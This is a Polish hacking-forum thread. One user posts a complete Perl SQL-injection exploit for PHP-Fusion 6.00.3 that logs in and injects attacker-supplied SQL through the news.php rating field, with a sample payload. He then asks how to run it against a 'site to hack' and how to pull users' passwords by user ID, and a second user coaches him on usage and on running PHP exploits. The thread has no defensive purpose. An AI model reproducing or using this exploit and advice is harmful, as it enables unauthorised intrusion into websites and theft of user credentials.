Exploit do PHP-Fusion 6.00.3 Released

[33-Turbo-33]

Witam mam problem z tym exploitem:

#!/usr/bin/perl

#Exploit for PHP-Fusion 6.00.3 Released

#Coded by:krasza[[email protected]]

#Greetz: [url]http://www.curityreason.com[/url]

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Cookies;

if(!$ARGV[3]){

print<<EOF;

Exploit for PHP-Fusion 6.00.3 Released

Coded by krasza

Contact me:[email protected]

Greets:

-http://www.ecurityreason.com

-http://www.revival.pl

-mulander



Usage:

perl phpfusion.pl url login pass sql

url-url hack site with [php fusion's directory]

login-your login

pass-your password

sql-[sql code]

Example:

t perl phpfusion.pl [url]http://www.something.com/php-fusion[/url] admin password 3','31337','HACKED')/*

EOF

exit;

}

my $url=shift;

my $login=shift;

my $haslo=shift;

my $sql=shift;

$url=$url."/news.php?readmore=1";

my $ua = new LWP::UserAgent;

$ua->agent("Exploit for PHP-Fusion" . $ua->agent);

$ua->cookie_jar( HTTP::Cookies->new(

'file' => 'ciasteczka.txt',

'autosave' => 1,));

print "[+]Connecting to $url...n";



my $zadanie = new HTTP::Request POST => $url;

$zadanie->content_type('application/x-www-form-urlencoded');

$zadanie->content('user_name=' . $login . '&user_pass=' . $haslo . '&login=Loguj'

);

my $wynik = $ua->request($zadanie);

if ($wynik->is_success){

print "[+]Connected to $urln";

#LOGIN JEST PRAWIDLOWE

}else{

print "[-]Connected failed to $urln";

print "[-]Error:".$wynik->message."n";

exit;

}

print "[+] Logging In $url...n";

$zadanie = new HTTP::Request POST => $url;

$zadanie->content_type('application/x-www-form-urlencoded');

$zadanie->content('rating='.$sql.'&post_rating=Dodaj+ocen%EA');

my $wynik2 = $ua->request($zadanie);

if ($wynik2->is_success){

print "[+] Sql query isn't done!n";

}else{

print "[-]Sql query is donen";

}



# milw0rm.com [2005-12-23]

znalazłem podatną strone ale i gdy chcę odpalić exploita wpisuję:

c: Perlbinperl 

c: exploit.pl 

[url]http://stronadoshakowania.pl[/url] <id usera> 2

http://stronadoshakowania.pl <id usera> 2 strona jest przykładowa ale nie wiem co oznacza <id usera> 2 bo to znalazełem na pewnym forum czy to oznacza nazwa użytkownika?
Proszę o pomoc z góry dziękuję[/code]

 

[boness]

Originally posted by !Turbo!
znalazłem podatną strone ale i gdy chcę odpalić exploita wpisuję:
Kod:
c: Perlbinperl
c: exploit.pl
http://stronadoshakowania.pl <id usera> 2

radze czytac ; ]


a id to numer uzytkownika...

 

[33-Turbo-33]

boness czyli jak mam odpalić exploita mam zrobić coś takiego:

c: Perlbinperl

c: exploit.pl

[url]http://stronadoshakowania.pl  2[/url]

czy tak:

c: Perlbinperl

c: exploit.pl

[url]http://stronadoshakowania.pl[/url] <id usera> 2

bo on pokaże hasło użytkownika który jest na liście? jak byn np na mojej stronie moje hasło to wpisze id użytkownika 1 ? bo jestem na liście pierwszy.......
Jeśli zrozumiem daję od razu pomógł ;]

 

[boness]

po 1: ten exploit* nie zadziala na dzisiejszych fusionach bo jest z 2005 roku..

po 2: tego exploita* nie odpalisz tak jak piszesz... musisz sie zastosowac do "usage".

*ten exploit = patrz post pierwszy...



Ale jesli bys mial exploita ktory wyciaga hasla po ID i twoje ID = 1, to wtedy wyciagnie twoje haslo jesli jestes pierwszy, to chyba oczywiste...

 

[33-Turbo-33]

jeszcze jedno pytanie a jak odpalić exploita w php?
trzeba coś posiadać na pc? jakiś program dodatkowy?

 

[boness]

Originally posted by !Turbo!
jeszcze jedno pytanie a jak odpalić exploita w php?
trzeba coś posiadać na pc? jakiś program dodatkowy?

cokolwiek, co pozwoli odpalic .php np to, od razu z perlem...